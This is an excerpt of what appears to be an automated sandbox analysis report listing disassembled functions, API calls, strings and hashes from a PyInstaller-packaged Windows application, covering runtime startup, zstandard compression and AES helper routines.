                                                                                                                                                                                                            • API String ID: 2462486908-243030088
                                                                                                                                                                                                            • Opcode ID: d3472b8363f48dda74b9a5e1538c2d12ad1e2601dac38e9c13848f121020587d
                                                                                                                                                                                                            • Instruction ID: 4a2f7b89b4b0494012a65befbf589dcb227da409bcea3390569bc710565d0911
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3472b8363f48dda74b9a5e1538c2d12ad1e2601dac38e9c13848f121020587d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35319271B0AB46A2EB418F75E4492697364FB84BD0F580135DE5E07798EF7CD885C324
                                                                                                                                                                                                            Function 00007FF8A7FF132C Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                            • Opcode ID: ca1d8b6d116e10edd81285e31af58da4c8709e9f50b76dc4867e5596487336d7
                                                                                                                                                                                                            • Instruction ID: 4ee0092e6cd2d677e71ef548c65f503f86e946751c8252fd4a1255376b18c5ca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca1d8b6d116e10edd81285e31af58da4c8709e9f50b76dc4867e5596487336d7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4681BB21E0E643A6FF50AF3694412BD2290EF95BC0F988035D90D837D2EFBCEA55A710
                                                                                                                                                                                                            Function 00007FF8A7E71030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285204631.00007FF8A7E70000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285237784.00007FF8A7E73000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285254997.00007FF8A7E74000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285271778.00007FF8A7E75000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                            • Opcode ID: ae43915e3b07681379ca8ba4e6bc2127fc77904d4e5f3c4d65703b2a9ee1d720
                                                                                                                                                                                                            • Instruction ID: 01552fdebe57312de6e618333b4abdb39d4cc23aaa75368f8e958e8f63d84846
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae43915e3b07681379ca8ba4e6bc2127fc77904d4e5f3c4d65703b2a9ee1d720
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28817C70E1E383A6FA50AF65A4413BD6691EFC5FC0F548035D90D87796EE3CE826A701
                                                                                                                                                                                                            Function 00007FF8A8131160 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$Xbad_alloc@std@@Xlength_error@std@@malloc
                                                                                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                                                                                            • API String ID: 1899970315-3788999226
                                                                                                                                                                                                            • Opcode ID: bd0aa35aa4605f6ea7af3ed8412f615baf8f76cb69ece129494e9b53ba2fcfe7
                                                                                                                                                                                                            • Instruction ID: 9b66f15753c66a0c5674f68edbb3d818eb4a7d2e5b4c983909f625c23525dc33
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd0aa35aa4605f6ea7af3ed8412f615baf8f76cb69ece129494e9b53ba2fcfe7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 654103B2B16B8192EE06CF66E404069A361FB45FE4F608631EE9D57798EF3CD046C354
                                                                                                                                                                                                            Function 00007FF8A7FFB6D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: error ending compression stream: %s$stream is closed$w*:readinto1
                                                                                                                                                                                                            • API String ID: 1736172965-504963644
                                                                                                                                                                                                            • Opcode ID: 12fa50a3bff4ebfe43530b21f22f4fc57c271da81567039875cc509c6e401e37
                                                                                                                                                                                                            • Instruction ID: 9f23accf89a0505804c89990842b10964553db6fa12f51723c7a276df653c77e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12fa50a3bff4ebfe43530b21f22f4fc57c271da81567039875cc509c6e401e37
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71416D22A1AB82A1EEA08F35E4403BD63A0FB84BD4F080236DA5D477E8DF7CD556D700
                                                                                                                                                                                                            Function 00007FF8A7FFB890 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 93COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: error ending compression stream: %s$stream is closed$w*:readinto
                                                                                                                                                                                                            • API String ID: 1736172965-398075013
                                                                                                                                                                                                            • Opcode ID: 0e577d86811fc5d46d55c192e4690ba2bdbef53433709ddb1683be3f0390e093
                                                                                                                                                                                                            • Instruction ID: b289cb448da341e14e9cf113681fe8a1a2551c3663f255b6e82b45f495f97302
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e577d86811fc5d46d55c192e4690ba2bdbef53433709ddb1683be3f0390e093
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26417221A0AB82A2EE648F39E54037D63A0FB85BD4F440232DA6D437D5DF7CE566C714
                                                                                                                                                                                                            Function 00007FF8A7FF4940 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$StringTrue$Arg_AttrCallErr_Keywords_ObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|kOO:stream_writer$must pass an object with a write() method$write
                                                                                                                                                                                                            • API String ID: 2870549108-3693950978
                                                                                                                                                                                                            • Opcode ID: 32773c7e9127f5f0231df4128b94e72bd3ea7500e4b7d4d7e83341baf61c7fa2
                                                                                                                                                                                                            • Instruction ID: ea1356a3bcb6c61484db58700dcfc70b6b89db58cdaa56a5ba6cd74f63f1036c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32773c7e9127f5f0231df4128b94e72bd3ea7500e4b7d4d7e83341baf61c7fa2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02312332B0AB4291EB10CF25E89427D33A4FB98B80F568136CA9D83754DF78D9A5D314
                                                                                                                                                                                                            Function 00007FF7ACE87420 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF7ACE874CC
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                                                                            • Opcode ID: 1ca30c699dbe1e4654e7c4d5696967e2b1b1a4f4c1085b5d0a2cfb7980eebcbf
                                                                                                                                                                                                            • Instruction ID: 17fb1699a05c61cbdc09241799714393370da5cb60ca5b8fb7cf3026fd644b7a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ca30c699dbe1e4654e7c4d5696967e2b1b1a4f4c1085b5d0a2cfb7980eebcbf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521A131B0EA82A6E760EF10E84027AF6A1FF98346FC54035E54DA26B4EF3CD155C720
                                                                                                                                                                                                            Function 00007FF8A8077010 Relevance: 15.1, APIs: 10, Instructions: 88synchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807702F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077043
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077050
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807705D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077090
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807709D
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770B9
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770FB
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077133
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077169
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSectionfree$ConditionVariableWake$DeleteEnterErrorLastLeaveObjectSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2873853953-0
                                                                                                                                                                                                            • Opcode ID: 4de5e97c6ddb56f078f08a66787419e51b379f67d2199333e07c58dab8524286
                                                                                                                                                                                                            • Instruction ID: 85847db577d891ce24d32594794d824020d8890b23fee577fa817e998f03627e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4de5e97c6ddb56f078f08a66787419e51b379f67d2199333e07c58dab8524286
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49418122A1AF4597EF518F74E8002796370FFA5BD8F084231DE4E06698DF3CE4A587A4
                                                                                                                                                                                                            Function 00007FF7ACE90158 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                            • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                            • Instruction ID: da6b3b31c4d8d90aab4c54c2e049d9ab2bfaa8acaa5cc2628c37f0eb8c7c78fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2712E672E0E183A6FB20BA94E0542BDF6A1FB48750FC54075F689666E4CF3CE5808B60
                                                                                                                                                                                                            Function 00007FF8A7FFE040 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 166COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_FormatKeywords_ParseSizeStringTuple
                                                                                                                                                                                                            • String ID: must only specify one of level or compression_params$must specify one of level or compression_params$unable to free CDict: %s$unable to precompute dictionary$|iO!:precompute_compress
                                                                                                                                                                                                            • API String ID: 891019847-2011864325
                                                                                                                                                                                                            • Opcode ID: 1ba54efc4feec415704184f3d9fc36c3f77557f81744860c39e757214a07988c
                                                                                                                                                                                                            • Instruction ID: 496f1269452d5334ac5c8087f92ab596662a8ec6ae8f2a4ac25e6df640c43203
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ba54efc4feec415704184f3d9fc36c3f77557f81744860c39e757214a07988c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21816D22E0AB4196EB14CF69E8402B973A1FBD9BD4F104235EE5D477A8EF7CE5918700
                                                                                                                                                                                                            Function 00007FF8A7E72800 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 152COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285204631.00007FF8A7E70000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285237784.00007FF8A7E73000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285254997.00007FF8A7E74000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285271778.00007FF8A7E75000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _wassert$memcpy
                                                                                                                                                                                                            • String ID: ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14))$(idx>=1) && (idx<=10)$src/AESNI.c$src/AESNI.c
                                                                                                                                                                                                            • API String ID: 4292997394-722309440
                                                                                                                                                                                                            • Opcode ID: f4b7383e48a649afa1040181157e148a0774ff101b2bbaf32e9f7de4cb086ac2
                                                                                                                                                                                                            • Instruction ID: ff0ec5797874204b36886be4bacef8cff45fca3e6edde11dbc509f01258aebb4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4b7383e48a649afa1040181157e148a0774ff101b2bbaf32e9f7de4cb086ac2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19610472E09A83A5FA218F25E4043BD73A5FB99BC8F504231CA4D67A04EF3DE595D704
                                                                                                                                                                                                            Function 00007FF8A8001B70 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$__stdio_common_vfprintffflushfprintf
                                                                                                                                                                                                            • String ID: warning : ZSTD_compressBegin_usingCDict failed $warning : could not compress sample size %u
                                                                                                                                                                                                            • API String ID: 2484644911-1446316337
                                                                                                                                                                                                            • Opcode ID: 3061314d21c036b507ce46a6bbb0e894f3fceb3729043024451404a86caede32
                                                                                                                                                                                                            • Instruction ID: 2846d1bbcbcf56a95f0db59b90e6a723f639d603976e2fef8b42057c6f8114a0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3061314d21c036b507ce46a6bbb0e894f3fceb3729043024451404a86caede32
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A851DD32A09A8192DF208F25D44466D7371FB99BD4F118232DAAD437D9CF3DD452CB18
                                                                                                                                                                                                            Function 00007FF8A7FFD8B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 102COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Format
                                                                                                                                                                                                            • String ID: unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s
